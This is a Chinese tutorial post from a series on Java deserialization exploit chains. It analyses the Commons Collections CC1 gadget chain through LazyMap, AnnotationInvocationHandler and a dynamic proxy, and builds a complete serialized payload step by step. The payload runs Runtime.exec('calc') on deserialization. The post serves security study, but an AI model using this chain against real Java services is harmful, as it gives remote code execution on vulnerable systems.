Java反序列化利用链篇 | CC1链的第二种方式-LazyMap版调用链【本系列文章的分析重点】

文章目录

  • CC1链的第二种方式-LazyMap版调用链
    • LazyMap
    • 构造payload
    • CC1的调用链

系列篇其他文章,推荐顺序观看~

  • Java反序列化利用链篇 | JdbcRowSetImpl利用链分析
  • Java反序列化利用链篇 | CC1链_全网最菜的分析思路【本系列文章的分析重点】
  • Java反序列化利用链篇 | CC1链的第二种方式-LazyMap版调用链【本系列文章的分析重点】
  • Java反序列化利用链篇 | URLDNS链
  • Java反序列化利用链篇 | CC6链分析(通用版CC链)
  • Java反序列化利用链篇 | CC3链分析、TemplatesImpl类中的调用链、TrAXFilter、InstantiateTransformer类的transform()【本系列文章的分析重点】

CC1链的第二种方式-LazyMap版调用链

CC1链的第一种方式可以参考另一篇文章:CC1链_全网最菜的分析思路

LazyMap

在之前的CC1链中分析,其实是其中一种方式(国内版本),还有另外一种方式,也是ysoserial中的CC1链的方式(国外版本)。

区别在于调用transform的类是不同的。

在寻找transform调用的时候,当时使用的是TransformedMap中的checkSetValue()方法。

其实在LazyMap的get()方法也满足需求,也能到达readObject()。

具体方法如下:

其中比较重要的代码是

Object value = factory.transform(key);

也就是我们如果能控制factory的值为ChainedTransformer,就可以实现命令执行。

factory的赋值语句在LazpMap的构造函数内部。

那又是谁调用了LazyMap的get()方法呢?

这里非常的不好找,因为调用太多了(找到的师傅牛~)。

AnnotationInvocationHandler类的invoke()方法中有调用:

而这个AnnotationInvocationHandler类是一个动态代理类,特点之一就是调用该类的任意方法,都会调用器invoke()方法。

所以如果调用AnnotationInvocationHandler类的readObject()方法,该类的invoke()方法也会触发。

因此,整个的调用链也就出来了:

sun.reflect.annotation.AnnotationInvocationHandler#readObject
sun.reflect.annotation.AnnotationInvocationHandler#invoke
org.apache.commons.collections.map.LazyMap#get
org.apache.commons.collections.functors.ChainedTransformer#transform
org.apache.commons.collections.functors.InvokerTransformer#transform

构造payload

从LazyMap的get()方法中可以看到,通过factory.transform(key)方式调用了transform()

所以根据CC1链的第一条,只需要控制factorychainedTransformer即可。

factory是在LazyMap的构造函数中赋值:

而此构造函数不能直接调用,但是可以通过decorate()方法获取到:

则可以得到如下不完整的payload:

Transformer[] TransformerArray = new Transformer[]{new ConstantTransformer(Runtime.class),new InvokerTransformer("getDeclaredMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
};
ChainedTransformer chainedTransformer = new ChainedTransformer(TransformerArray);// 通过decorate()方法获取到LazyMap对象,并将ChainedTransformer传入
LazyMap lazyMap = (LazyMap) LazyMap.decorate(new HashMap(), chainedTransformer);

其中调用lazyMap的get()方法,则会触发恶意代码,测试一下:

// 调用lazyMap的get()方法则会调用chainedTransformer的transformer()lazyMap.get("key");

接下来想办法:如何调用到lazyMap的get()方法呢?

前面说在AnnotationInvocationHandler类的invoke()方法中有调用get()方法:

而这里的调用,是通过memberValues来进行调用,我们需要保证memberValueslazyMap,这样的话,执行该invoke()方法时才会调用到lazyMapget()方法。

memberValues是通过AnnotationInvocationHandler的构造函数传入:

AnnotationInvocationHandler类不能实例化,需要借助反射,相关代码如下:

Class<?> aClass = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
Constructor<?> declaredConstructor = aClass.getDeclaredConstructor(Class.class, Map.class);
declaredConstructor.setAccessible(true);
// AnnotationInvocationHandler类实现自InvocationHandler接口
InvocationHandler ih = (InvocationHandler)declaredConstructor.newInstance(Target.class, lazyMap);  // 注意这里传入lazpMap,给memberValues赋值

那如何调用InvocationHandler ih对象的invoke()方法呢?

这里可以看到AnnotationInvocationHandler类实现自InvocationHandler接口,也就是说AnnotationInvocationHandler类是一个动态代理的处理器类。

那么,想调用InvocationHandler ih对象的invoke()方法,只需要调用被代理对象的任意方法,则可以调用ih对象的invoke()。这里需要注意:直接调用被代理对象的任意方法不行,需要借助动态代理才可以调用到invoke(),也就是说需要创建动态代理。

创建动态代理代码如下:

  • 这里的动态代理对象,用来代理LazyMap实现的接口,处理器对象为ih
Map mapProxy = (Map)Proxy.newProxyInstance(LazyMap.class.getClassLoader(), new Class[]{Map.class}, ih);  // 将InvocationHandler ih传入

这样只需要调用LazyMap对象的任意方法,就会调用ih对象的invoke()

注意这里虽然调用任意方法,可以调用ih对象的invoke(),但是还得保证,调用invoke()方法之后,能执行到Object result = memberValues.get(member);,这样才能执行我们想要的lazyMapget()方法。

我们可以看到:执行invoke方法之后,有一些条件需要绕过一下,否则就直接返回了,无法执行到memberValues.get(member)

总结下来就是:动态代理的执行方法(即被代理对象lazyMap的任意方法)不能是equals\toString\hashCode\annotationType方法,且不能存在参数。

那么,被代理对象lazyMap可执行的方法(看代理的接口Map的方法)还有下面几个:

测试一下是否可以执行恶意代码:

Transformer[] TransformerArray = new Transformer[]{new ConstantTransformer(Runtime.class),new InvokerTransformer("getDeclaredMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
};
ChainedTransformer chainedTransformer = new ChainedTransformer(TransformerArray);LazyMap lazyMap = (LazyMap) LazyMap.decorate(new HashMap(), chainedTransformer);Class<?> aClass = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
Constructor<?> declaredConstructor = aClass.getDeclaredConstructor(Class.class, Map.class);
declaredConstructor.setAccessible(true);
InvocationHandler ih = (InvocationHandler)declaredConstructor.newInstance(Target.class, lazyMap);Map mapProxy = (Map) Proxy.newProxyInstance(lazyMap.getClass().getClassLoader(), lazyMap.getClass().getInterfaces(), ih);mapProxy.clear();

接下来,寻找谁调用了mapProxy(被代理对象)的size()/isEmpty()/clear()/keySet()/values()/entrySet()方法。

其实这里(在CC1链的第一条中也用过)刚好AnnotationInvocationHandlerreadObject方法中存在 map对象的entrySet()无参方法调用:

其中我们需要保证memberValues变量为mapProxy(被代理对象)即可,而且这里是在readObject方法中,直接一步到位。

这里怎么办呢?

同样的,通过反射创建AnnotationInvocationHandler对象,并将mapProxy(被代理对象)传入,给memberValues变量赋值即可:

Class<?> aClass = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
Constructor<?> declaredConstructor = aClass.getDeclaredConstructor(Class.class, Map.class);
declaredConstructor.setAccessible(true);
InvocationHandler obj = (InvocationHandler)declaredConstructor.newInstance(Target.class, mapProxy);

而这里的前面三行已经有了,所以此时的payload可以合并为:

Transformer[] TransformerArray = new Transformer[]{new ConstantTransformer(Runtime.class),new InvokerTransformer("getDeclaredMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
};
ChainedTransformer chainedTransformer = new ChainedTransformer(TransformerArray);// 通过decorate()方法获取到LazyMap对象,并将ChainedTransformer传入
LazyMap lazyMap = (LazyMap) LazyMap.decorate(new HashMap(), chainedTransformer);Class<?> aClass = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
Constructor<?> declaredConstructor = aClass.getDeclaredConstructor(Class.class, Map.class);
declaredConstructor.setAccessible(true);
InvocationHandler ih = (InvocationHandler)declaredConstructor.newInstance(Target.class, lazyMap);  // 注意这里传入lazpMap,给memberValues赋值Map mapProxy = (Map)Proxy.newProxyInstance(LazyMap.class.getClassLoader(), new Class[]{Map.class}, ih);  // 将InvocationHandler ih传入InvocationHandler obj = (InvocationHandler)declaredConstructor.newInstance(Target.class, mapProxy);

得到了一个对象obj,对其序列化,反序列时会自动调用器readObject()方法,执行恶意代码。

则最终的payload为:

Transformer[] TransformerArray = new Transformer[]{new ConstantTransformer(Runtime.class),new InvokerTransformer("getDeclaredMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
};
ChainedTransformer chainedTransformer = new ChainedTransformer(TransformerArray);LazyMap lazyMap = (LazyMap) LazyMap.decorate(new HashMap(), chainedTransformer);Class<?> aClass = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
Constructor<?> declaredConstructor = aClass.getDeclaredConstructor(Class.class, Map.class);
declaredConstructor.setAccessible(true);
InvocationHandler ih = (InvocationHandler)declaredConstructor.newInstance(Target.class, lazyMap);Map mapProxy = (Map)Proxy.newProxyInstance(LazyMap.class.getClassLoader(), new Class[]{Map.class}, ih);Object obj = declaredConstructor.newInstance(Target.class, mapProxy);SerAndUnser.serialize(obj);
SerAndUnser.unserialize("ser.bin");

CC1的调用链

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.xdnf.cn/news/147251.html

如若内容造成侵权/违法违规/事实不符,请联系一条长河网进行投诉反馈,一经查实,立即删除!

相关文章

Maven进阶-二、依赖

Maven进阶 第一章 Maven依赖 文章目录 Maven进阶前言依赖传递依赖优先级可选依赖排除依赖总结 前言 maven管理项目时&#xff0c;各包之间相互依赖&#xff0c;该篇简单记录对maven依赖的学习认知。 在使用maven导入依赖时&#xff0c;可以看到有的依赖包下有二级目录&#x…

传输层 III(TCP协议——可靠传输)【★★★★】

&#xff08;★★&#xff09;代表非常重要的知识点&#xff0c;&#xff08;★&#xff09;代表重要的知识点。 一、可靠传输的工作原理 我们知道&#xff0c; TCP 发送的报文段是交给 IP 层传送的。但 IP 层只能提供尽最大努力服务&#xff0c;也就是说&#xff0c; TCP 下面…

【人工智能】在大型活动中的应用案例

人工智能在娱乐大型活动中的应用 ## 作者主页: 知孤云出岫 目录 **人工智能在娱乐大型活动中的应用****1. 引言****2. 智能票务与入场管理****2.1 动态定价与票务预测****2.2 生物识别技术快速入场****2.3 区块链技术防伪票务管理** **3. 智能观众互动与个性化体验****3.1 个性…

神经网络面试题目

1. 批规范化(Batch Normalization)的好处都有啥&#xff1f;、 A. 让每一层的输入的范围都大致固定 B. 它将权重的归一化平均值和标准差 C. 它是一种非常有效的反向传播(BP)方法 D. 这些均不是 正确答案是&#xff1a;A 解析&#xff1a; ‌‌‌‌  batch normalization 就…

【对比学习串烧】 SimSiam MoCov3 DINO

文章目录 文章列表十一、SimSiam11.1 研究背景11.2 解决问题11.3 实施方案11.4 论文摘要11.5 文章图示图1&#xff1a;SimSiam架构图2&#xff1a;SimSiam与/无stop-gradient的比较图3&#xff1a;不同孪生网络架构的比较 十二、MoCo v312.1 研究背景12.2 解决问题12.3 论文摘要…

24年 九月 刷题记录

1. leetcode997找到小镇的法官 小镇里有 n 个人&#xff0c;按从 1 到 n 的顺序编号。传言称&#xff0c;这些人中有一个暗地里是小镇法官。 如果小镇法官真的存在&#xff0c;那么&#xff1a; 小镇法官不会信任任何人。 每个人&#xff08;除了小镇法官&#xff09;都信任这…

helm安装promethues

1、添加 Helm 仓库&#xff1a; helm repo add prometheus-community https://prometheus-community.github.io/helm-charts helm repo update 2、安装 Prometheus&#xff1a;安装promtheus到monitor名称空间中 kubectl create ns monitor helm search repo prometheus #查…

传输层 II(TCP协议——协议的特点、报文段、连接管理)【★★★★】

&#xff08;★★&#xff09;代表非常重要的知识点&#xff0c;&#xff08;★&#xff09;代表重要的知识点。 一、TCP 协议的特点 TCP 是在不可靠的 IP 层之上实现的可靠的数据传输协议&#xff0c;它主要解决传输的可靠、有序、无丢失和不重复问题。TCP 是 TCP/IP 体系中非…

校园美食导航:Spring Boot技术的美食发现之旅

第二章 系统分析 2.1 可行性分析 可行性分析的目的是确定一个系统是否有必要开发、确定系统是否能以最小的代价实现。其工作主要有三个方面&#xff0c;分别是技术、经济和社会三方面的可行性。我会从这三个方面对网上校园周边美食探索及分享平台进行详细的分析。 2.1.1技术可行…

12.1K Star,开源问答社区

Hi&#xff0c;骚年&#xff0c;我是大 G&#xff0c;公众号「GitHub 指北」会推荐 GitHub 上有趣有用的项目&#xff0c;一分钟 get 一个优秀的开源项目&#xff0c;挖掘开源的价值&#xff0c;欢迎关注。 今天推荐一个使用 Go 语言编写的开源问答社区平台&#xff0c;支持积…

作业报告┭┮﹏┭┮(Android反调试)

一&#xff1a;Android反调试 主要是用来防止IDA进行附加的&#xff0c;主要的方法思路就是&#xff0c;判断自身是否有父进程&#xff0c;判断是否端口被监听&#xff0c;然后通过调用so文件中的线程进行监视&#xff0c;这个线程开启一般JNI_OnLoad中进行开启的。但是这个是…

Easy Excel从入门到精通!!!

目录 1.文件导入 1.1基本方式读取excel文件内容 1.2注解模型映射器读取excel 1.3多行表头读取 1.4文件上传读取 2.文件导出 2.1基本方式导出 2.2模型映射导出 2.3设置行高、列宽等内容 2.4合并单元格 2.5导出设置超链接、批注、公式 2.6模板填充对象导出 2.7模板填…

数据集-目标检测系列-火车检测数据集 train >> DataBall

数据集-目标检测系列-火车检测数据集 train >> DataBall 数据集-目标检测系列-火车检测数据集 数据量&#xff1a;1W 想要进一步了解&#xff0c;请联系 DataBall。 DataBall 助力快速掌握数据集的信息和使用方式&#xff0c;会员享有 百种数据集&#xff0c;不断增加…

K8s Calico替换为Cilium,以及安装Cilium过程

一、删除Calico kubectl delete daemonset calico-node -n kube-systemkubectl delete deployment calico-kube-controllers -n kube-system kubectl delete ds kube-flannel-ds -n kube-system kubectl delete cm calico-config -n kube-system kubectl delete secret calico…

Docker安装mysql并配置主从,超详细

简介&#xff1a; 本文使用docker安装mysql&#xff0c;并创建master节点&#xff0c;slave节点用于实现主从。废话不多说&#xff0c;直接开始。 1.docker下载镜像&#xff0c;这里我以5.7版本为例。 docker pull mysql:5.7 2.在宿主机上新建如下目录&#xff0c;进行文件挂…

STM32F407单片机编程入门(十四) 内部RTC实时时钟详解及实战含源码

文章目录 一.概要二.RTC基本介绍三.STM32单片机RTC内部结构图四.CubeMX配置一个RTC时间例程五.CubeMX工程源代码下载六.小结 一.概要 RTC&#xff08;Real-Time Clock&#xff09;是一种用于追踪和记录实际时间的时钟系统。在STM32中&#xff0c;RTC通常用于提供实时时钟和日期…

cnn机器学习时python版本不兼容报错

在使用python执行CNN算法时&#xff0c;发生如下报错&#xff1a; A module that was compiled using NumPy 1.x cannot be run in NumPy 2.1.1 as it may crash. To support both 1.x and 2.x versions of NumPy, modules must be compiled with NumPy 2.0. Some module may …

MySQL 中的全文索引:强大的文本搜索利器

《MySQL 中的全文索引&#xff1a;强大的文本搜索利器》 在 MySQL 数据库中&#xff0c;全文索引是一种非常有用的功能&#xff0c;它可以帮助我们快速地在大量文本数据中进行搜索。那么&#xff0c;什么是 MySQL 中的全文索引呢&#xff1f;它又是如何工作的呢&#xff1f;让…

wordpress迁移到别的服务器

wordpress论坛网站搭建 于2023/11/16写的该文章 一-配置环境 配置LNMP&#xff08;linuxnginxmysqlphpphpmyadmin&#xff09;环境或者LAMP&#xff08;apache&#xff09; 可以选择集成了这些软件的套件 下载链接&#xff1a;https://www.xp.cn/download.html 手动下载这…

传输层 IV(TCP协议——流量控制、拥塞控制)【★★★★】

&#xff08;★★&#xff09;代表非常重要的知识点&#xff0c;&#xff08;★&#xff09;代表重要的知识点。 一、TCP 流量控制&#xff08;★★&#xff09; 1. 利用滑动窗口实现流量控制 一般说来&#xff0c;我们总是希望数据传输得更快一些。但如果发送方把数据发送得…